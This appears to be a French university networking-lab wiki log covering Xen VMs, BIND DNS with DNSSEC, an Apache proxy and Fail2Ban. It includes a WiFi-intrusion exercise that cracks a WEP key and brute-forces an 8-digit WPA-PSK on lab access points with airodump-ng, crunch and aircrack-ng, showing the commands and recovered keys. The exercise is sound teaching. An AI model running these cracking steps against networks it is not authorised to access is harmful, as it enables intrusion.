    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, alors il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.&lt;br /&gt;
&lt;br /&gt;
=== Glue Record ===&lt;br /&gt;
Pour que le domaine soit accessible depuis Internet, j’ai ajouté un '''Glue Record''' sur '''Gandi'''. &lt;br /&gt;
&lt;br /&gt;
Cela permet d’associer l’adresse '''IPv4''' de la machine mandataire et l’adresse '''IPv6''' de ma machine de services aux serveurs de noms du domaine.&lt;br /&gt;
&lt;br /&gt;
* ns.tompere2.xyz&lt;br /&gt;
** IPv4 : &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt;&lt;br /&gt;
** IPv6 : &amp;lt;code&amp;gt;2001:660:4401:60a0:216:3eff:fe3f:9410&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
Pour sécuriser le DNS, nous devons apporter quelques modifications au fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;.&lt;br /&gt;
En effet, nous allons rajouter ces lignes dans &amp;lt;code&amp;gt;zone &amp;quot;tompere2.xyz&amp;quot;&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
notify yes;  // Notification des secondaires&lt;br /&gt;
key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot;;&lt;br /&gt;
inline-signing yes;&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;De plus, il faut ajouter&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ces lignes servent à définir une '''politique de signature'''. Cela indique quelles clés utiliser (KSK/ZSK), leur durée de vie et l’algorithme de signature.&lt;br /&gt;
&lt;br /&gt;
Les clés vont être créer automatiquement au redémarrage de bind, mais il faut pour cela créer un dossier &amp;lt;code&amp;gt;/bind/keys&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, nous pouvons redémarrer bind pour vérifier la création des clés.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
systemctl restart named&lt;br /&gt;
systemctl enable named&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Les clés sont biens générées !&lt;br /&gt;
&lt;br /&gt;
Il faut désormais '''copier la clé publique''' (.key) sur '''Gandi'''.&lt;br /&gt;
&lt;br /&gt;
Dans mon cas, j'avais 2 clés publiques .key, donc j'ai copié ces deux clés sur Gandi, mais comme nous allons voir, une seule est utile.&lt;br /&gt;
&lt;br /&gt;
Pour mieux visualiser le déploiement de notre DNS, nous pouvons utiliser deux sites bien utiles :&lt;br /&gt;
*https://dnschecker.org/&lt;br /&gt;
*https://dnsviz.net/&lt;br /&gt;
&lt;br /&gt;
&amp;lt;small&amp;gt;Remarque : Nous avons également utilisé &amp;lt;code&amp;gt;dig&amp;lt;/code&amp;gt; pour nos tests intermédiaires.&amp;lt;/small&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le premier site, DNSChecker, nous informe si la propagation de notre DNS a eu lieu.&lt;br /&gt;
&lt;br /&gt;
Dans le cas de '''tompere2.xyz''', on voit que c'est bon, aussi bien en IPv4 qu'en IPv6.&lt;br /&gt;
[[Fichier:Déploiement IPv4.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
[[Fichier:Déploiement DNS IPv6.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
Le DNS marche bien ! Super !&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant s'assurer que la partie sécurisée, fonctionne également.&lt;br /&gt;
&lt;br /&gt;
Rendons nous sur '''DNSViz''', un outil qui nous donnera plus d'informations à ce sujet.&lt;br /&gt;
[[Fichier:DNS Viz.png|néant|vignette|Le DNSSEC fonctionne !]]&lt;br /&gt;
Comme on le vois, le DNSSEC fonctionne ! Cela dit, une clé est inutilisée, comme indiqué sur le schéma en gris clair. Nous pouvons la supprimer de '''Gandi,''' pour rendre l'architecture plus cohérente.&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Objectif ===&lt;br /&gt;
L'objectif du serveur Apache sera de pouvoir servir les pages webs de nos machines de services.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install apache2&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Paramètrage sur machine mandataire ====&lt;br /&gt;
Avant de commencer, il nous faut activer quelques modules permettant le bon fonctionnement d'Apache.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod ssl&amp;lt;/code&amp;gt; : active le module SSL pour permettre les connexions sécurisées en '''HTTPS (TLS)''' avec certificats.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy&amp;lt;/code&amp;gt; : active les fonctionnalités de '''reverse proxy''', permettant à Apache de rediriger les requêtes vers un autre serveur.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy_http&amp;lt;/code&amp;gt; : active le support du proxy pour le protocole '''HTTP.'''&lt;br /&gt;
&lt;br /&gt;
Sur la machine mandataire, nous avons créé et rempli le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/000-tompere2.xyz-ssl.conf&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName ns.tompere2.xyz&lt;br /&gt;
    Redirect permanent / https://tompere2.xyz/    &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName tompere2.xyz&lt;br /&gt;
    ServerAlias tompere2.xyz&lt;br /&gt;
    DocumentRoot /var/www/html/&lt;br /&gt;
    CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/tompere2.xyz.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/tompere2.xyz.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/tompere2.xyz.pem&lt;br /&gt;
    SSLVerifyClient None&lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier permet à la machine mandataire de gérer l’accès au site '''tompere2.xyz'''.&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/var/www/html/index.html&amp;lt;/code&amp;gt;, nous avons modifié le titre pour pouvoir visualiser que les changements étaient bien pris en considération.&amp;lt;syntaxhighlight lang=&amp;quot;html&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;title&amp;gt;Tom et Aurele Page: It works&amp;lt;/title&amp;gt;&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Résultat ====&lt;br /&gt;
Finalement, nous obtenons bien un accès au site '''tompere2.xyz''' avec le nouveau titre ![[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
=== Contexte et objectifs ===&lt;br /&gt;
Les machines '''exposées en SSH''' sur Internet sont constamment ciblées par des '''attaques automatisées''' qui enchaînent des milliers de tentatives de '''connexion par force brute''' afin de deviner des identifiants. Il est donc essentiel de mettre en place un système comme '''Fail2ban pour détecte'''r ces tentatives répétées '''et bloquer''' automatiquement les adresses IP malveillantes.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install fail2ban&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Définition du Fail2Ban ====&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/etc/fail2ban/jail.local&amp;lt;/code&amp;gt; de la '''machine mandataire''', nous pouvons définir la façon dont le fail2ban va agir.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
[sshd]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = ssh&lt;br /&gt;
filter = sshd&lt;br /&gt;
ignoreip = 127.0.0.1&lt;br /&gt;
findtime = 10m&lt;br /&gt;
bantime = 5m&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, nous sommes protégés contre les tentatives de brute force par SSH. En effet, au bout de 3 échecs consécutifs, l'utilisateur malveillant est banni temporairement.&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12453</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12453"/>
		<updated>2026-02-26T17:31:49Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Informations utiles ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+&lt;br /&gt;
!Machine&lt;br /&gt;
!Nom&lt;br /&gt;
!Site web&lt;br /&gt;
!IPv4 publique&lt;br /&gt;
|-&lt;br /&gt;
|Ma machine de service&lt;br /&gt;
|TomPere2&lt;br /&gt;
|tompere2.xyz&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine de service d'Aurèle&lt;br /&gt;
|TomPere1&lt;br /&gt;
|tompere.online&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine mandataire&lt;br /&gt;
|TomPere0&lt;br /&gt;
|''NA''&lt;br /&gt;
|193.48.57.168&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
=== Créer ses  VMs ===&lt;br /&gt;
&lt;br /&gt;
==== Prérequis ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous devons nous connecter à ''CapBreton'' pour pouvoir y créer nos machines virtuelles.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
ssh root@capbreton&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ensuite, nous utiliserons l'hyperviseur de machine virtuelle Xen pour créer nos VMs.&lt;br /&gt;
&lt;br /&gt;
==== Création ====&lt;br /&gt;
&lt;br /&gt;
Voici la commande permettant de créer ma machine de service. &amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
xen-create-image --hostname=SE4-TomPere2 --dhcp --bridge=pont_pere --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2048M --force&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Maintenant que nous avons une machine virtuelle créer, il faut la démarrer et s'y connecter ! C'est ce que permettent les deux commandes suivantes :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
xen create /etc/xen/SE4-TomPere2.cfg&lt;br /&gt;
xen console SE4-TomPere2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Vérification ====&lt;br /&gt;
Remarque : On peut vérifier que '''les machines virtuelles en cours d’exécution''' grâce à &amp;lt;code&amp;gt;xen list&amp;lt;/code&amp;gt; .&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@capbreton:/var# xen list | grep Tom&lt;br /&gt;
SE4-Tompere1                               389  2048     1     -b----    3574.5&lt;br /&gt;
SE4-Tompere2                               390  2048     1     -b----    3343.2&lt;br /&gt;
SE4-Tompere0                               399  2048     1     -b----    8849.0&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Comme on le voit,  nos 3 machines sont démarrées !&lt;br /&gt;
&lt;br /&gt;
=== Partionnage ===&lt;br /&gt;
&lt;br /&gt;
==== Configuration ====&lt;br /&gt;
On ajoute dans le fichier &amp;lt;code&amp;gt;/etc/xen/SE4-Tompere2.cfg&amp;lt;/code&amp;gt; nos partitions '''home''' et '''var'''.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
    root        = '/dev/xvda2 ro'&lt;br /&gt;
    disk        = [&lt;br /&gt;
                    'file:/usr/local/xen/domains/SE4-Tompere2/disk.img,xvda2,w',&lt;br /&gt;
                    'file:/usr/local/xen/domains/SE4-Tompere2/swap.img,xvda1,w',&lt;br /&gt;
                    'phy:/dev/virtual/Tompere2-home,xvda3,w',&lt;br /&gt;
                    'phy:/dev/virtual/Tompere2-var,xvdb1,w',&lt;br /&gt;
                ]&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Montage des partitions ====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
mkfs -t ext4 /dev/xvdb1&lt;br /&gt;
mount /dev/xvdb1 /mnt&lt;br /&gt;
mv /var/* /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
mount -a&lt;br /&gt;
mkfs -t ext4 /dev/xvda3&lt;br /&gt;
mount -a&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Le montage des partitions est fait ! On peut par ailleurs le voir via &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;. Cependant, au redémarrage de la VM, les partitions ne seront pas automatiquement montées. Ainsi, il faut modifier le fichier &amp;lt;code&amp;gt;/etc/fstab&amp;lt;/code&amp;gt;:&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
proc            /proc           proc    defaults        0       0&lt;br /&gt;
devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
/dev/xvda1 none swap sw 0 0&lt;br /&gt;
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
/dev/xvda3 /var ext4 defaults 0 2&lt;br /&gt;
/dev/xvdb1 /home ext4 defaults 0 2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, nos partitions '''var''' et '''home''' seront bien montés comme il se doit au démarrage.&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
Ajouter une configuration réseau à nos machines virtuelles est essentiel pour accéder à Internet et pour pouvoir utiliser SSH sur nos machines depuis l'extérieur. C'est ce que nous allons voir dans cette partie.&lt;br /&gt;
&lt;br /&gt;
=== Ping entre les deux machines de services ===&lt;br /&gt;
Comme premier jalon, intéressons nous à la façon de relier nos machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons d'abord modifier les fichiers &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Sur ma machine de services TomPere2 :&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
auto eth0&lt;br /&gt;
	iface eth0 inet static&lt;br /&gt;
		address 192.168.0.3&lt;br /&gt;
		netmask 255.255.255.0&lt;br /&gt;
		gateway 192.168.0.1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;et sur la machine mandataire TomPere0 :&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.0.1&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet static&lt;br /&gt;
    address 193.48.57.168&lt;br /&gt;
    netmask 255.255.255.224&lt;br /&gt;
    gateway 193.48.57.162&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Après un &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; puis &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt; pour charger les modifications apportées, cette configuration nous a permis de voir l'adresse IPV4 correspondante à &amp;lt;code&amp;gt;eth0&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;ip address&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
De ce fait, nous avons pu '''ping''' d'une machine à l'autre via le commutateur virtuel.&lt;br /&gt;
&lt;br /&gt;
==== Résultat ====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+IPs de TomPere1&lt;br /&gt;
!TomPere1&lt;br /&gt;
!IPs&lt;br /&gt;
|-&lt;br /&gt;
|IPv4&lt;br /&gt;
|192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
|IPv6&lt;br /&gt;
|2001:660:4401:60a0:216:3eff:fe4b:1909&lt;br /&gt;
|}&lt;br /&gt;
Nous pouvons voir dans le tableau ci-dessus les '''IPs de la machine de service TomPere1''', ce qui nous permettra de '''tester la connexion avec l'utilitaire ping'''.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@SE4-Tompere2:~# ping 192.168.0.2&lt;br /&gt;
PING 192.168.0.2 (192.168.0.2) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 192.168.0.2: icmp_seq=1 ttl=64 time=0.236 ms&lt;br /&gt;
